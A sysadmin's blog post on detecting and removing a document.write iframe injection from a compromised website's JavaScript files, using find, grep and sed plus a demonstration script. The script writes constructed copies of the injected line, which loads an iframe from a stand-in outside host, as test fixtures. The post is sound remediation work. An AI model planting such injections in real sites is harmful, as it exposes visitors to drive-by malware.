A customer just called in an emergency: they had received a mail from Google saying their websites were infected with malware. It took half an hour to analyse and resolve the situation. This post shows how to find and remove the injected code using UNIX command line tools.
Date: 15.12.2012 07:04
Subject: Malware notification regarding example.de
To: firstname.lastname@example.org, email@example.com, firstname.lastname@example.org, email@example.com, firstname.lastname@example.org, email@example.com, firstname.lastname@example.org, email@example.com
Dear site owner or webmaster of example.de,

We recently discovered that some of your pages can cause users to be infected with malicious software. We have begun showing a warning page to users who visit these pages by clicking a search result on Google.com.
Below are some example URLs on your site which can cause users to be infected (space inserted to prevent accidental clicking in case your mail client auto-links URLs):
Here is a link to a sample warning page:
We strongly encourage you to investigate this immediately to protect your visitors. Although some sites intentionally distribute malicious software, in many cases the webmaster is unaware because:
1) the site was compromised
2) the site doesn’t monitor for malicious user-contributed content
3) the site displays content from an ad network that has a malicious advertiser
If your site was compromised, it’s important to not only remove the malicious (and usually hidden) content from your pages, but to also identify and fix the vulnerability. We suggest contacting your hosting provider if you are unsure of how to proceed. StopBadware also has a resource page for securing compromised sites:
Once you’ve secured your site, you can request that the warning be removed by visiting
and requesting a review. If your site is no longer harmful to users, we will remove the warning.
Google Search Quality Team
Note: if you have an account in Google’s Webmaster Tools, you can verify the authenticity of this message by logging into https://www.google.com/webmasters/tools/siteoverview and going to the Message Center, where a warning will appear shortly.
When we looked at the .js files ourselves we saw that the injected code uses the document.write() function to write additional markup, here an iframe, into the HTML document.
To find all infected files I used find combined with xargs and grep:

$ find . -type f -print0 | xargs -0 grep -l --null iframe | xargs -0 grep -l document.write

-type f                 Find all regular files, not e.g. directories
-print0                 Every found filename is terminated by a NUL byte instead of a newline, so names containing whitespace survive the pipe
xargs                   Run a command with each input item as an argument
-0                      Read input items terminated by NUL
grep -l                 Look for the content in each file and list only the filename
iframe                  Content to look for
--null                  Terminate the listed filenames with NUL as well, so the next xargs -0 can read them
grep -l document.write  Keep only those files that also contain the string document.write

The filenames produced by find are passed by xargs as arguments to grep: xargs is a program that executes a command for every item it receives, e.g. via stdin, which is what the pipe provides. The result is a list of all infected files.
In this case the referenced sites were freewww.biz, freewww.info, ..., so find all files containing freewww and remove the injected code using sed:

$ for f in $(find . -type f -print0 | xargs -0 grep -l freewww); do sed -i '' -e 's/;document.write(.<iframe .* src=.*freewww.*><\/iframe>.);//' "$f"; done

find . -type f -print0 | xargs -0 grep -l freewww   Find all files containing the string freewww
for f in $(...); do ...; done                       Process all found files, referencing each one as $f
sed -i '' -e                                        Edit each file in place (BSD/macOS syntax; GNU sed takes a bare -i) using the given expression
s/oldvalue/newvalue/options                         Replace the malicious instruction ;document.write('<iframe ... src=...freewww...></iframe>'); with "nothing", i.e. delete it. The wildcards (. and .*) ignore the other noise in the injected code, such as the quote characters and the remaining iframe attributes.

Since $(...) word-splits its output on whitespace, this loop only works reliably when no filename contains spaces; the -print0/-0 pair protects the inner pipeline but not the for loop around it.
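The detection pipeline and the sed removal loop above, worked through end to end as an added example that is not the article's own script: it builds a small constructed web root (one file with the injection, one in a directory whose name contains a space, one that merely mentions an iframe, one clean file), lists the infected files with a NUL-safe find/xargs/grep chain, strips the injected statement with sed while keeping a backup, and then verifies that no reference to the indicator is left. Only the string "freewww" comes from the article; the host freewww.example, all file names and contents are constructed, and the script assumes GNU or BSD grep (--null) and xargs (-r).

```shell
#!/bin/sh
# Added example, not the article's script: detect, clean and verify the
# document.write('<iframe ...>') injection on a constructed sample tree.
# Assumes GNU or BSD grep (--null) and xargs (-r). Only "freewww" is from the
# article; freewww.example and every file below are constructed.

IOC='freewww'   # indicator from the article: the injected iframe pointed at freewww.* hosts

# Construct a throw-away web root: one infected file, one infected file in a
# directory whose name contains a space, one file that mentions "iframe"
# without the injection, and one clean file. Prints the root directory.
make_sample_root() {
    root=$(mktemp -d)
    mkdir -p "$root/js" "$root/lib with space"
    printf '%s\n' \
        "var a=1;document.write('<iframe width=1 height=1 src=http://freewww.example/x.php></iframe>');" \
        > "$root/js/main.js"
    printf '%s\n' 'function f(){}' \
        ";document.write('<iframe src=http://freewww.example/y.php></iframe>');" \
        > "$root/lib with space/util.js"
    printf '%s\n' '// builds the element through the DOM API instead' \
        'var el = document.createElement("iframe");' > "$root/js/clean-iframe.js"
    printf '%s\n' 'console.log("hello");' > "$root/js/clean.js"
    printf '%s\n' "$root"
}

# Detection: list every .js file that contains both "iframe" and
# "document.write". Filenames stay NUL-terminated between the stages
# (-print0 / --null / -0) so paths with whitespace are handled; -r stops
# xargs from running grep with no arguments. sort is the last command, so a
# grep "no match" status (1) does not abort a caller running under set -e.
find_infected() {
    find "$1" -type f -name '*.js' -print0 \
        | xargs -0 -r grep -l --null 'iframe' \
        | xargs -0 -r grep -l 'document\.write' \
        | sort
}

count_infected() {
    find_infected "$1" | wc -l | tr -d ' '
}

# Cleanup: keep a .orig copy, then delete the injected statement. Writing to
# a temp file and renaming sidesteps the BSD ("sed -i ''") versus GNU
# ("sed -i") syntax difference. [^>]* instead of .* keeps the match inside
# the single <iframe> tag, so a greedy wildcard cannot swallow legitimate
# code further along the same line.
remove_injection() {
    find_infected "$1" | while IFS= read -r f; do
        cp "$f" "$f.orig"
        sed -e "s|;document\.write(.<iframe[^>]*${IOC}[^>]*></iframe>.);||g" "$f" > "$f.tmp" \
            && mv "$f.tmp" "$f"
    done
}

# Succeeds only when no .js file under the root still references the indicator
# (the .orig backups are deliberately excluded by the -name filter).
verify_clean() {
    ! find "$1" -type f -name '*.js' -print0 | xargs -0 -r grep -q "$IOC"
}

# Stand-alone run: detect, clean, verify.
demo() {
    root=$(make_sample_root)
    echo "infected files in $root:"
    find_infected "$root"
    remove_injection "$root"
    verify_clean "$root" && echo "cleanup verified: no $IOC reference left"
}
demo
```

The verification step matters in practice: re-running the detection after the sed pass confirms the pattern actually matched every variant of the injection, and the .orig copies let you diff what was removed before deleting the backups.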
What was this all about? I’m pretty sure it was the last change the customer had requested a few days ago:
Please allow automatic updates of my Whatever PHP-based application, so allow write access for the webserver.
Why am I sure?
I usually do not allow write access for the webserver (except e.g. for file uploads or temporary session files) and I can’t remember the last time I had such a situation :-D